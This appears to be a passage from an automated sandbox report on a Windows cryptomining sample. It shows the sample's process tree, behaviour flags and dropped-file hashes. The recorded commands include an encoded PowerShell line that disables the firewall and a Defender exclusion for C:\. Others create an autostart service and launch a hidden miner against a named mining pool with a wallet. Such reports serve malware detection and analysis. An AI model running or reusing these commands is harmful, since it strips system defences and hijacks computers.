of 3924 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 101 PID 2112 wrote to memory of 3924 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 101 PID 3924 wrote to memory of 3248 3924 powershell.exe 103 PID 3924 wrote to memory of 3248 3924 powershell.exe 103 PID 2112 wrote to memory of 3480 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 107 PID 2112 wrote to memory of 3480 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"U2V0LU5ldEZpcmV3YWxsUHJvZmlsZSAtUHJvZmlsZSBEb21haW4sUHVibGljLFByaXZhdGUgLUVuYWJsZWQgRmFsc2U=\")))"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionPath 'C:\'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Windows\system32\sc.exesc create alina binpath=\"C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe\" start=auto2⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\system32\sc.exesc start alina2⤵
- Launches sc.exe
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\r.exe"C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 03⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3248
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3480 -
C:\Windows\system32\r.exe"C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 03⤵PID:5000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""2⤵PID:4836
-
C:\Windows\system32\r.exe"C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 03⤵PID:4612
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f0d5a1fbaaca4c45dae188fc923fd695
SHA115993a3ca80fe46ea106454b3c8893c23988fc80
SHA256b98f796e2088c39005eea9ee1682580abf60809aafe73714d00c88ec4dbfe1c8
SHA512c95fc9aec153e124267a7d075b0723307b814a30274b3d7904aaaccff5c67c90ffca7e8f7f668f78baaa6174bff28d0ce8d417bb0c29d9c850f0498dc36db2a8
-
Filesize
1KB
MD5d6e4b5ceebccd8a56241844898613c4b
SHA173f3d91314f9d0cd74cd2499926f207cb63d8220
SHA25647b5174bbaebcdf5f64c5b2b521e3822c8242ade3aba1dfa29b26ae7a970d967
SHA512dc7980d5db1e6e53d94c490ee02fddb09d5a21d842f8ddc5ea8f4bcaf46b668dc8ca235ebbca12aa776a48843e044e4a81916a757401c17c1d9c3b1cbafbbe2e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
58.2MB
MD50abc545bc8a8a1990c557a847acacced
SHA1e07426bc3912a9f074db94e424d3efb031394866
SHA256c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc
SHA512200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d
-
Filesize
58.2MB
MD50abc545bc8a8a1990c557a847acacced
SHA1e07426bc3912a9f074db94e424d3efb031394866
SHA256c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc
SHA512200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d
-
Filesize
30.0MB
MD5cec4a96581f9b04a6a475168f3237fa4
SHA11620a65eb044f49519cd6a1b9b754ec9b6725b14
SHA256e3e435ab9ce098877dd56cc216432ff1d2d2866f0d24fc200bbec5839c236bb8
SHA5120a32bc3e8c61b3cabf10c1563ce75351d21b017d4370bf58c1e9ef58e814f7f3f03e6c46411694d4240ec63f15cab18abb818df5409678d337f6c082f5058132
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5190cc2feb6fbf6a6143f296ebe043de5
SHA18fa72a99c46ed77b602476c85ca2d8ea251b22fb
SHA2564faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
SHA51294fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616
-
Filesize
58.2MB
MD50abc545bc8a8a1990c557a847acacced
SHA1e07426bc3912a9f074db94e424d3efb031394866
SHA256c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc
SHA512200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d